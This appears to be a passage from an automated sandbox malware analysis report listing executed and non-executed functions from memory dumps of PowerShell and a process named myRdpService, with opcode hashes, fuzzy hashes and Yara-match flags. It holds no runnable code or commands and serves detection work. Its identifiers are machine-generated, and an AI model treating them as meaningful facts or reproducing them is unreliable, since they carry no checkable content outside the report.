                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d20858eecdd9b499c2f64348a66d89db90aa2a9dcd3ccb1aa448a1ba5b0546ab
                                                                                        • Instruction ID: e44375555383e95baec48320fb9d49b62edbfb254b84db6743d95ed8d1adc4d0
                                                                                        • Opcode Fuzzy Hash: d20858eecdd9b499c2f64348a66d89db90aa2a9dcd3ccb1aa448a1ba5b0546ab
                                                                                        • Instruction Fuzzy Hash: A341E571808F4D8EEB64EF48D8857F8BBF0FF15310F0481AAD05EAB251DAB49945CB80
                                                                                        Function 00007FFA83BD7EEF Relevance: .1, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9e3381cb7d8f0e6c2a97a1bac04f824289d751d2f455f7b612ba5f44b669511e
                                                                                        • Instruction ID: 2c9a633061c8cd8f4e84478279dc7592e3829ff493ed1dcb6651c447c2a1d83f
                                                                                        • Opcode Fuzzy Hash: 9e3381cb7d8f0e6c2a97a1bac04f824289d751d2f455f7b612ba5f44b669511e
                                                                                        • Instruction Fuzzy Hash: 3A416271908A5C8FDF68EF48D895BE9B7B1FF64310F008299D04EA7251DE70AA85CF81
                                                                                        Function 00007FFA83BD6700 Relevance: .1, Instructions: 89COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 71bbbaa9c6effa29a9a3917c85afedd4691fff6ee7b84de6ab4c1092c0f1e302
                                                                                        • Instruction ID: 7aa4eed1cafd677b19e77ce5d21403e1fc7a44f60f043ba97e11a1cbecc8ea1c
                                                                                        • Opcode Fuzzy Hash: 71bbbaa9c6effa29a9a3917c85afedd4691fff6ee7b84de6ab4c1092c0f1e302
                                                                                        • Instruction Fuzzy Hash: E921A760A08A4A4BDB64AB78C86A6BD7BE1FF56310F14413DE08FA75D2DD786841C780
                                                                                        Function 00007FFA83BDB040 Relevance: .1, Instructions: 81COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 67e2f751e7a5002d2150fc4e1c1b841a4e2fec49fb0ca45501938374e304e693
                                                                                        • Instruction ID: 8539c9139cc037b93319e3c1b71fa20cc109bf26e2005af0796224d862fd9eb6
                                                                                        • Opcode Fuzzy Hash: 67e2f751e7a5002d2150fc4e1c1b841a4e2fec49fb0ca45501938374e304e693
                                                                                        • Instruction Fuzzy Hash: 7B215E71A1CB858FD790EB68C44876ABBE1FB99310F144A7EE08DC3251DBB8D485C742
                                                                                        Function 00007FFA83BD6F81 Relevance: .0, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: beecf55f3a655016edb7a43b34b2c30516834a5ffd295f74740f51a6f4a7dada
                                                                                        • Instruction ID: 751f3b0decea5bff5cc3f389b0256fcb1c4a4e97ba89ec81bf57179ac3586e47
                                                                                        • Opcode Fuzzy Hash: beecf55f3a655016edb7a43b34b2c30516834a5ffd295f74740f51a6f4a7dada
                                                                                        • Instruction Fuzzy Hash: 1801F76180EF854FD3539778586A2A2BFE0DF5612070886EFD0C9CB5A3D85C58868356
                                                                                        Function 00007FFA83BD33B5 Relevance: .0, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 33ee3356dda89a4d7df1a1edc0decf387feeb76cdc43a44fe9b08ee816e11a39
                                                                                        • Instruction ID: 4e94f8e55206596f96affd2113166c87f5ee5070a35b56f7751ce84fb9af804e
                                                                                        • Opcode Fuzzy Hash: 33ee3356dda89a4d7df1a1edc0decf387feeb76cdc43a44fe9b08ee816e11a39
                                                                                        • Instruction Fuzzy Hash: 1501447111CB0C4FDB44EF0CE451AA5B7E0FB95324F14456DE58AC3651DA36E882CB46
                                                                                        Function 00007FFA83BD6FA0 Relevance: .0, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000001B.00000002.3782630828.00007FFA83BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_27_2_7ffa83bd0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 56ae45364a73c16afe1184bb875c2c8a7bb5a8ade928a673b94aa2603f948d33
                                                                                        • Instruction ID: e66ac329d4f78aa6daa207f3cce9c388a2d6ddeca5982db45b3827d0ca67cdb9
                                                                                        • Opcode Fuzzy Hash: 56ae45364a73c16afe1184bb875c2c8a7bb5a8ade928a673b94aa2603f948d33
                                                                                        • Instruction Fuzzy Hash: 39F0276090DE080FE365E77C105A2F6BBF1EFA92207088BBFD08DC3166D92858468385

                                                                                        Non-executed Functions

                                                                                        Function 00007FF6DFEBDB00 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000002C.00000002.4249455546.00007FF6DFE01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF6DFE00000, based on PE: true
                                                                                        • Associated: 0000002C.00000002.4249390211.00007FF6DFE00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 0000002C.00000002.4251536366.00007FF6E04C8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 0000002C.00000002.4252674200.00007FF6E0860000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 0000002C.00000002.4252734299.00007FF6E0862000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 0000002C.00000002.4252734299.00007FF6E0880000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 0000002C.00000002.4252734299.00007FF6E0883000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 0000002C.00000002.4252734299.00007FF6E0885000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 0000002C.00000002.4252972996.00007FF6E0888000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_44_2_7ff6dfe00000_myRdpService.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                        • String ID:
                                                                                        • API String ID: 2933794660-0
                                                                                        • Opcode ID: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
                                                                                        • Instruction ID: a7acdb7e0fe8c13610232bc48ac7eb74a5c07cb0c05eeea77afe742fc0d8e6c7
                                                                                        • Opcode Fuzzy Hash: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
                                                                                        • Instruction Fuzzy Hash: D3111C32B14F01DAFB008F60E8542A933A4FB59B58F451E35DA6D867A4DF79D1988344

                                                                                        Executed Functions

                                                                                        Function 00007FFA83BC33B5 Relevance: .0, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000002D.00000002.4237650776.00007FFA83BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_45_2_7ffa83bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 390b43d0d27606fcc6d81820381354590e1f2259c2c4aab3fcf2d16506637991
                                                                                        • Instruction ID: 6d8e6f663ed4673805db3c9552a90535bd2efdc129d0094ca60ddf14427c7d7f
                                                                                        • Opcode Fuzzy Hash: 390b43d0d27606fcc6d81820381354590e1f2259c2c4aab3fcf2d16506637991
                                                                                        • Instruction Fuzzy Hash: 8001447111CB0C4FDB44EF0CE451AA5B7E0FB95324F54456DE58AC3651DA26E882CB46

                                                                                        Non-executed Functions

                                                                                        Function 00007FFA83BC05C0 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000002D.00000002.4237650776.00007FFA83BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA83BC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_45_2_7ffa83bc0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (0$8,$P/$p0
                                                                                        • API String ID: 0-2820422917
                                                                                        • Opcode ID: d3505fcdfd89b485201525d025ebd3da7abbfcb556bc512a513c159a27b2a687
                                                                                        • Instruction ID: bd9490453236adbb925f8932ab725c119d8bb81f2cfa631960266a66ab85db2a
                                                                                        • Opcode Fuzzy Hash: d3505fcdfd89b485201525d025ebd3da7abbfcb556bc512a513c159a27b2a687
                                                                                        • Instruction Fuzzy Hash: 7F11A3C694EBC14FE7264BA4585A0753F61BBA730072C80BBE0DC571EBD899D916C381